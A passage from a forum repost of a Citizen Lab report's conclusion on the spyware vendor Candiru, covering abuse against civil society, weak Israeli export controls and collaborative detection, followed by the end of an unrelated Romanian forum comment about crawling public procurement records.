commonality with NSO Group, including representation by the same law firm and utilization of the same employee equity and trust administration services company. 6. Conclusion Candiru’s apparent widespread presence, and the use of its surveillance technology against global civil society, is a potent reminder that the mercenary spyware industry contains many players and is prone to widespread abuse. This case demonstrates, yet again, that in the absence of any international safeguards or strong government export controls, spyware vendors will sell to government clients who will routinely abuse their services. Many governments that are eager to acquire sophisticated surveillance technologies lack robust safeguards over their domestic and foreign security agencies. Many are characterized by poor human rights track records. It is not surprising that, in the absence of strong legal restraints, these types of government clients will misuse spyware services to track journalists, political opposition, human rights defenders, and other members of global civil society. Civil Society in the Crosshairs…Again The apparent targeting of an individual because of their political beliefs and activities that are neither terrorist or criminal in nature is a troubling example of this dangerous situation. Microsoft’s independent analysis is also disconcerting, discovering at least 100 victims of Candiru’s malware operations that include “politicians, human rights activists, journalists, academics, embassy workers and political dissidents.” Equally disturbing in this regard is Candiru’s registration of domains impersonating human rights NGOs (Amnesty International), legitimate social movements (Black Lives Matter), international health organizations (WHO), women’s rights themes, and news organizations. Although we lack context around the specific use cases connected to these domains, their mere presence as part of Candiru’s infrastructure—in light of widespread harms against civil society associated with the global spyware industry—is highly concerning and an area that merits further investigation. Rectifying Harms around the Commercial Spyware Market Ultimately, tackling the malpractices of the spyware industry will require a robust, comprehensive approach that goes beyond efforts focused on a single high-profile company or country. Unfortunately, Israel’s Ministry of Defense—from whom Israeli-based companies like Candiru must receive an export license before selling abroad—has so far proven itself unwilling to subject surveillance companies to the type of rigorous scrutiny that would be required to prevent abuses of the sort we and other organizations have identified. The export licensing process in that country is almost entirely opaque, lacking even the most basic measures of public accountability or transparency. It is our hope that reports such as this one will help spur policymakers and legislators in Israel and elsewhere to do more to prevent the mounting harms associated with an unregulated spyware marketplace. It is worth noting the growing risks that spyware vendors and their ownership groups themselves face as a result of their own reckless sales. Mercenary spyware vendors like Candiru market their services to their government clients as “untraceable” tools that evade detection and thus prevent their clients’ operations from being exposed. However, our research shows once again how specious these claims are. Although sometimes challenging, it is possible for researchers to detect and uncover targeted espionage using a variety of networking monitoring and other investigative techniques, as we have demonstrated in this report (and others like it). Even the most well-resourced surveillance companies make operational mistakes and leave digital traces, making their marketing claims about being stealthy and undetectable highly questionable. To the extent that their products are implicated in significant harms or cases of unlawful targeting, the negative exposure that comes from public interest research may create significant liabilities for ownership, shareholders, and others associated with these spyware companies. Finally, this case shows the value of a community-wide approach to investigations into targeted espionage. In order to remedy the harms generated by this industry for innocent members of global civil society, cooperation among academic researchers, network defenders, threat intelligence teams, and technology platforms is critical. Our research drew upon multiple data sources curated by other groups and entities with whom we cooperated, and ultimately helped identify software vulnerabilities in a widely used product that were reported to and then patched by its vendor. Acknowledgements Thanks to Microsoft and Microsoft Threat Intelligence Center (MSTIC) for their collaboration, and for working to quickly address the security issues identified through their research. We are especially grateful to the targets that make the choice to work with us to help identify and expose the entities involved in targeting them. Without their participation this report would not have been possible. Thanks to Team Cymru for providing access to their Pure Signal Recon product. Their tool’s ability to show Internet traffic telemetry from the past three months provided the breakthrough we needed to identify the initial victim from Candiru’s infrastructure Funding for this project was provided by a generous grant from the John D. and Catherine T. MacArthur Foundation, the Ford Foundation, Oak Foundation, Sigrid Rausing Trust, and Open Societies Foundation. Thanks to Miles Kenyon, Mari Zhou, and Adam Senft for communications, graphics, and organizational support. Sursa: https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/
      • 1
      • Like
  25. Adica sa "ataci" putinii oameni care munesc la stat. Daca vrei sa faci ceva super util, dupa parerea mea, fa un crawler sa iei documentele din SEAP - Sistemul Electronic de Achizitii Publice care sa arate cam unde se duc banii pe care ii platim noi catre stat.
×
×
  • Create New...